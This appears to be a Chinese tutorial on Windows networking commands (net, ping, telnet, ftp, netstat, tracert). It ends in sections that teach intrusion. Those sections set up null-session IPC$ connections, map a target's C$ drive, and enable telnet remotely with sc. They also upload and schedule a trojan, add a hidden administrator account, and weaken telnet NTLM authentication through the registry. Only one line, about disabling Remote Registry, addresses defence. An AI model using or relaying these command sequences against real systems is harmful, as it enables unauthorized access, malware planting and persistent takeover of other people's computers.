使用ping命令测试网络连接

获取NETBIOS主机名

format: “ping -a IP地址”

for example: “ping -a 172.16.10.20”

使用net命令管理网络**

net account该命令用于更新用户的账户数据库，并且为所有账户修改密码和登录需求，如：强制用户在时间到期之后多久必须注销、密码最长/短使用期限、密码长度下限、锁定阈值、锁定**时间、锁定观测窗口和计算机角色等详细信息

format:

“net accounts [/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|unlimited}][/minpwage:days][/uniquepw:number][/sync][/domain]”

​

for example:

“net accounts”

参数说明不带参数显示密码、登录限制和域信息的当前配置/forcelogoff:{minutes|no}设置当前用户账户或有效登录时间到期时在结束用户与服务器会话前等待的分钟数/minpwlen:length设置用户账户密码的最少字符数/maxpwage:{days|unlimited}设置用户账户密码有效天数的最大值/maxpwage:unlimited设置账户密码永远有效/minpwage:days设置用户可以更改新密码前的最小天数/uniquepw:number设置用户不对number次密码更改重复相同的密码/sync更新所有成员服务服务器的用户账户数据库/domain对当前域的主域控制器执行操作

net computer该命令用于添加或者删除域数据库中的计算机，所有计算机的添加和删除都会转发到主域控制器

format：“net computer \\computername {/add|/del}”

net config

该命令用于显示工作站或服务器服务的配置消息，或者显示并更改某项服务的设置

format：“net config [service[options]]”

参数说明service通过net config命令进行配置的服务options服务的特定选项

net config workstation命令用于显示更改配置工作站服务参数，更改立即生效并永久**

format：“net config workstation [/charcount:bytes][/chartime:msec][/charwait:sec]”

参数说明/charcount:bytes指定在数据发送到通信设备之前Windows收集的数据量，默认16字节/chartime:msec设置Windows在将数据发送到通信设备前手机数据的毫秒数，默认250毫秒/charwait:sec将Windows等待通信设备的秒数设置为可用，默认3600秒

net continue该命令能用重新激活挂起的服务

format：“net continue service”

net file用于显示某种服务器上所有打开的共享文件夹及锁定文件夹数，也可以关闭个别文件并取消文件锁定参数说明id文件标识号/close关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令net group用于Windows NT Server域中添加、更改或显示全局组，仅在Windows NT Server域中可用format：“net group [groupname [/comment:"text"]][/domain] net group groupname {/add[/comment:"text"]|delete}[/domain] net group groupname username[...]{/add|/delete}[/domain]”参数说明groupname要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表/comment:"text"为新建组或现有组添加注释。最多48个字符并用引号将注释文字引注/domain在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作username[...]列表显示要添加到组或从组中删除的一个或多个用户/add添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立账号/delete删除组或从组中删除用户名net help该命令用于提供网络命令列表及帮助主题，可以说不会用net命令，就用这个命令就可以了format：“net help [command] net command {/help|/?}”net localgroup用于显示、删除或更改本地组format：“net localgroup [groupname [/comment:"text"]][/domain] net localgroup groupname{/add [/comment:"text"]|/delete}[/domain] net localgroup groupname name[...]{/add|/delete}[/domain]”net name用于添加或删除消息名（有时称别名），或显示计算机接受消息的列表。要使用该命令则必须先运行信使服务format：”net name[name [/add|/delete]]“net print用于显示或控制打印作业及打印队列format：”net print \computername net print \sharename net print [\computername] job# [/hold|/release|/delete]“net session用于列出或断开本地计算机和与之连接的客户端会话format：”net session [\computername][/delete]“net send用于向网络的其他用户、计算机发送消息。要接受消息必须运行信使服务format：”net send {name|*|/domain[:name]|/users} message“参数说明name要接受发送消息得用户名、计算机名或通信名*将消息发送到组中所有名称/domain[:name]将消息发送到计算机域中的所有名称/users将消息发送到与服务器连接的所有用户message作为消息发送的文本net share用于创建、删除或显示共享资源format：”net share sharename net share sharename=drive:path [/users:number|/unlimited][/remark:"text"] net share sharename [/users:number|unlimited][/remark:"text"] net share {sharename|drive:path} /delete“参数说明sharename共享资源的网络名称drive:path指定共享文件的绝对路径/users:number设置可同时访问共享资源的最大用户数/unlimited不限制同时访问用户数/remark:"text"添加关于共享的注释/delete停止共享资源net time用于时计算机的时间与另一台计算机或域的时间同步。不带/set参数时，将显示另外一台计算机或域的时间format：”net time [\\computername|/domain[:name]][/set]“参数\computername要检查或同步的服务器名/domain[:name]指定要与其同步时间的域/set使本计算机时钟与指定计算机或域的时间同步

使用telnet命令进行远程登陆

格式format：”telnet ip地址/主机名称“步骤输入”telnet 主机名/ip地址“启动telnet会话一旦telnet成功连接到远程计算机上，就显示登陆信息并提示用户输入用户名和口令如果输入正确就能成功的登录并在远程计算机上工作​

使用ftp命令进行数据传输

格式format：”ftp -v -d -l -n -g [主机名]“参数说明-v显示远程服务器的所有响应信息-d使用调试**，显示在客户端和服务器之间传递的ftp命令-l传送多个文件时关闭交换提示-n限制ftp的自动登录-g取消全局文件名​

使用netstat命令查看网络连接的相关信息

使用netstat -a命令：显示所有连接和端口使用netstat -b命令：显示包含创建每个连接或者监听端口的可执行文件使用netstat -e命令：显示以太网数据统计，可以结合-s使用使用netstat -n命令：能以网络IP地址代替名称，显示网络连接情形netstat /help查看命令帮助。。。​

使用tracert命令查看IP数据报的传输路径

tracert是路由跟踪实用程序，该命令用于确定IP数据包访问目标所采取的路径format：“tracert [-d][-h maximum_hops][-j host-list][-w timeout] targer_name”for example:“tracert 主机名”参数说明-d指定不将IP地址解析到主机名-h maximum_hops指定跃点数以跟踪到成为target_name的主机的路由-j host-list指定tracert实用程序数据包所采用路径中的路由接口列表-w timeout等待timeout为每次回复所指定的毫秒数target_name目标主机名称或IP地址​

IPC$入侵与防范

建立IPC$连接format：“net use \\IP\ipc$ Password/user:Admin”​IP:目标ip地址Password：目标计算机密码Admin：目标计算机用户名建立映射format：“net use z:\\IP\c$”​\\IP\c$ 表示目标电脑上的C盘，符号$表示隐藏的共享，z:表示将远程主机的C盘映射为本地磁盘的盘符查看远程连接format：“net use * /del”空连接漏洞format：“net use \\ip "" /user:"" ” --注意一共有四个空格 引号不能少IPC$连接原本是要求客户机具有足够的权限才能连接到主机，然而该漏洞允许客户端使用空用户名和密码就可以与目标主机成功建立连接。虽然这样无法执行管理类操作，既不能映射网络驱动器、上传文件、执行脚本命令，但是却可以用来探测目标主机中的一些信息。​

Telnet入侵

使用telnet入侵前必须建立IPC$连接，建立连接是为了方便开启远程计算机中被禁用的telnet服务format：“sc \\ip config tlntsvr start=auto” --用sc命令把禁用的telnet服务变成自动 “sc \\ip start tlntsvr” --用sc命令启动telnet服务 “telnet ip” --登录telnet “net share” --查看默认共享 “net share sharename=drive:path” --建立c$共享 “copy \1.txt \\ip\c$” --copy命令上传木马 这里是把命令行切到c盘下了，1.txt在C盘根目录 “at \\ip time cmd” --at命令定时执行 time参数为时间 cmd为上传到目标主机共享的程序名 即木马 “net user 用户名 密码 /add” --添加用户 “net localgroup administrators 用户名 /add” --为上一步添加的用户名加入工作组 注意：如果对方采用了NTLM认证策略，可以连接网络注册表修改HKEYLOCAL\MACHINE\SOFTWARE\MICROSOFT\TELNETSERVERf\1.0 下的NTLM键值由2改成0，然后重启telnet服务​​

通过注册表入侵

Windows注册表是帮助Widnows控制硬件、软加你、用户**和Windows界面的一套数据文件，入侵者可在注册表编辑器中通过连接网络注册表进入远程计算机的注册表并进行实时监控。如果想阻止该入侵，只需要关闭Remote Registry服务​